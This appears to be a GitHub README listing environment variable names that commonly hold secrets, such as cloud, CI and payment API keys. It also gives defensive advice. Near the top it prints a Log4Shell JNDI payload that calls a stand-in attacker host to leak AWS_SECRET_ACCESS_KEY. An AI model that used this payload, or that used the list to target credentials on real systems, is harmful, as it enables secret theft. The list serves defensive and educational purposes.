🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on

Awesome list of secrets in environment variables

📝 Description

List of secrets, passwords, API keys, tokens stored inside a system environment variables.

An environment variable is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.

Many developer documentations recommends storing secrets inside an environment variable, but is it the best way to keep secrets?

The attacker can read values inside system environment variable by using exploits:

• CVE-2021-44228 JNDI log4j (JAVA) (Read more...)

  ${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}

  Get AWS_SECRET_ACCESS_KEY or return NO_EXISTS

• CVE-XXXX-XXXX Web browser attack (Writeup/POC coming soon to my Github - Follow me on Github and Twitter 😉

• and much more...

Because of that I created, a list of secrets in environment variables to help secure software.

Some of practices to avoid leak of secrets stored in environment variables is to:

• Block/notify on WAF when the request includes system environment variables
• Store in system environment variable path to a config file, instead of clean value
• Encrypt values inside environment variable
• Use different way to store secrets 🤓

You can check your system environment variables:

• Windows execute in PowerShell: dir env:
• Linux/MacOS execute in terminal: printenv or env

Awesome list of secrets in environment variables

A

AWS

• AWS_ACCESS_KEY_ID
• AWS_SECRET_ACCESS_KEY
• AMAZON_AWS_ACCESS_KEY_ID
• AMAZON_AWS_SECRET_ACCESS_KEY

source: https://docs.aws.amazon.com/sdkref/latest/guide/setting-global-aws_secret_access_key.html

Azure

• AZURE_CLIENT_ID
• AZURE_CLIENT_SECRET
• AZURE_USERNAME
• AZURE_PASSWORD
• MSI_ENDPOINT
• MSI_SECRET

source: https://docs.microsoft.com/en-us/dotnet/api/azure.identity.environmentcredential?view=azure-dotnet
source: https://techcommunity.microsoft.com/t5/azure-developer-community-blog/understanding-azure-msi-managed-service-identity-tokens-caching/ba-p/337406

B

Binance

• binance_api
• binance_secret

source: https://algotrading101.com/learn/binance-python-api-guide/

Bittrex

• BITTREX_API_KEY
• BITTREX_API_SECRET

source: https://github.com/TeamWertarbyte/crypto-trading-bot/blob/development/README.md

C

CircleCI

• CIRCLE_TOKEN

source: https://circleci.com/docs/2.0/api-developers-guide/

D

Digitalocean

• DIGITALOCEAN_ACCESS_TOKEN

source: https://github.com/digitalocean/doctl#authenticating-with-digitalocean

Dockerhub

• DOCKERHUB_PASSWORD

source: https://circleci.com/docs/2.0/env-vars/

E

F

Fastlane products

• ITC_PASSWORD

source: https://github.com/phatblat/fastlane-variables

Facebook

• FACEBOOK_APP_ID
• FACEBOOK_APP_SECRET
• FACEBOOK_ACCESS_TOKEN

G

Github

• GH_TOKEN
• GITHUB_TOKEN
• GH_ENTERPRISE_TOKEN
• GITHUB_ENTERPRISE_TOKEN

source: https://cli.github.com/manual/gh_help_environment

Google Cloud

• GOOGLE_APPLICATION_CREDENTIALS
• GOOGLE_API_KEY

source: https://cloud.google.com/docs/authentication/getting-started#windows

Gitlab

• CI_DEPLOY_USER
• CI_DEPLOY_PASSWORD
• GITLAB_USER_LOGIN
• CI_JOB_JWT
• CI_JOB_JWT_V2
• CI_JOB_TOKEN

source: https://docs.gitlab.com/ee/ci/variables/predefined_variables.html

H

I

J

K

L

M

Mailgun

• MAILGUN_API_KEY

source: https://www.pulumi.com/registry/packages/mailgun/installation-configuration/

MongoDB

• MCLI_PRIVATE_API_KEY
• MCLI_PUBLIC_API_KEY

https://docs.mongodb.com/mongocli/stable/configure/environment-variables/

N

NPM

• NPM_TOKEN

source: https://docs.npmjs.com/using-private-packages-in-a-ci-cd-workflow

O

OpenStack command-line client

• OS_PASSWORD

source: https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html

P

Percy.io

• PERCY_TOKEN

source: https://docs.percy.io/docs/environment-variables

Q

R

S

Sentry

• SENTRY_AUTH_TOKEN

source: https://docs.sentry.io/product/cli/configuration/

Slack

• SLACK_TOKEN

source: https://slack.dev/node-slack-sdk/getting-started

Square

• square_access_token
• square_oauth_secret

source: https://www.npmjs.com/package/square/v/12.0.0?activeTab=readme

Stripe

• STRIPE_API_KEY
• STRIPE_DEVICE_NAME

source: https://stripe.com/docs/cli/api_keys

T

Twilio

• TWILIO_ACCOUNT_SID
• TWILIO_AUTH_TOKEN

Source: https://www.twilio.com/blog/2017/01/how-to-set-environment-variables.html

Twitter

• CONSUMER_KEY
• CONSUMER_SECRET

source: https://developer.twitter.com/en/docs/authentication/guides/authentication-best-practices

Travis Ci

• TRAVIS_SUDO
• TRAVIS_OS_NAME
• TRAVIS_SECURE_ENV_VARS

source: https://docs.travis-ci.com/user/environment-variables

U

V

Vault HashiCorp

• VAULT_TOKEN
• VAULT_CLIENT_KEY

source: https://www.vaultproject.io/docs/commands

Vultr

• TOKEN
• VULTR_ACCESS
• VULTR_SECRET

source: https://www.vultr.com/docs/deploying-javascript-unikernels-to-vultr-with-ops

W

X

Y

Z

Get a RAW list:

The repository includes the raw list:

raw_list.txt

It is auto-generated from README.md by GitHub action.

😎 Contributing

👍🎉 First off, thanks for taking the time to contribute! 🎉👍

If you would like to add more secrets:
Please read and follow our Contributing guide

Thanks! 🦄

💻 Useful links

• Stackoverflow - Is it secure to store passwords as environment variables (rather than as plain text) in config files?
• Google - Best practices for securely using API keys
• An Introduction to Environment Variables and How to Use Them
• Why you shouldn't use ENV variables for secret data
• The Triumph and Tragedy of .env Files

🤝 Show your support

🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on

✔️ Disclaimer

This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.